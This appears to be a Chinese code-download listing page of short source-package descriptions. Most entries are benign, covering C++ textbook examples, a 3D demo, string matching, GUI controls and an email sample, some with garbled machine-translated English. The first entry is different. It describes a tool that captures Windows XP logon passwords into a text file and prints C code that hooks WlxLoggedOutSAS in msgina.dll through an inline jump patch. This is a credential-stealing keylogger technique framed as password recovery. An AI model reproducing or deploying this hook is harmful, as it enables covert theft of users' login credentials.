-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
21天学通C++,Jesse Liberty 和Bradley Jones编著 第五版课程上面的程序案例。...
21天学通C++,Jesse Liberty 和Bradley Jones编著 第五版课程上面的程序案例。-21-day study-pass C++, Jesse Liberty and Bradley Jones compiled the fifth edition of the course the above procedure cases.
- 2022-01-30 20:59:34下载
- 积分:1
-
外国人搞的,非常神奇的机器码!如此小的程序能产生效果如此好的3D动画,见识见识吧!运行方式在文件中有...
外国人搞的,非常神奇的机器码!如此小的程序能产生效果如此好的3D动画,见识见识吧!运行方式在文件中有-foreigners engaging and very magical binary! Such a small procedure would produce results so good 3D animation, insight insights! Operation is in the document
- 2022-06-28 13:20:44下载
- 积分:1
-
使用Boyer
使用Boyer-Moore-Horspool-Sunday 算法进行字符串匹配的系列函数-Using the Boyer-Moore-Horspool-Sunday algorithm for string matching a series of functions
- 2023-05-05 00:00:04下载
- 积分:1
-
Teach you how to use the paint brush strokes, as well as the graphics function
教你如何使用画笔画刷,以及图形函数,如直线,矩形等-Teach you how to use the paint brush strokes, as well as the graphics function
- 2022-02-15 05:51:18下载
- 积分:1
-
一个自己实现CString类的程序,实现了=+<<等运算符的重载...
一个自己实现CString类的程序,实现了=+
- 2022-06-13 16:42:03下载
- 积分:1
-
有关树形控件的使用
有关树形控件的使用-controls on the use of tree
- 2022-01-28 11:14:33下载
- 积分:1
-
改变RealPlay的外观
改变RealPlay的外观-change the appearance of Real
- 2022-06-16 03:19:31下载
- 积分:1
-
写的五角星,写的很差 功能简单的
写的五角星,写的很差 功能简单的-Written by five-pointed star, to write a simple function of the poor
- 2022-04-15 09:46:29下载
- 积分:1
-
SMART PHONE 2005 on sending E
SMART PHONE 2005中关于发送E-MAIL的使用例子源码, 可以使用此代码,向任何MAIL地址发送E-MAIL,需用VS2005BETA2进行编译。-SMART PHONE 2005 on sending E-MAIL examples of the use of source code, you can use this code to any MAIL Send E-MAIL, unless required VS2005BETA2 computer.
- 2022-09-04 12:30:02下载
- 积分:1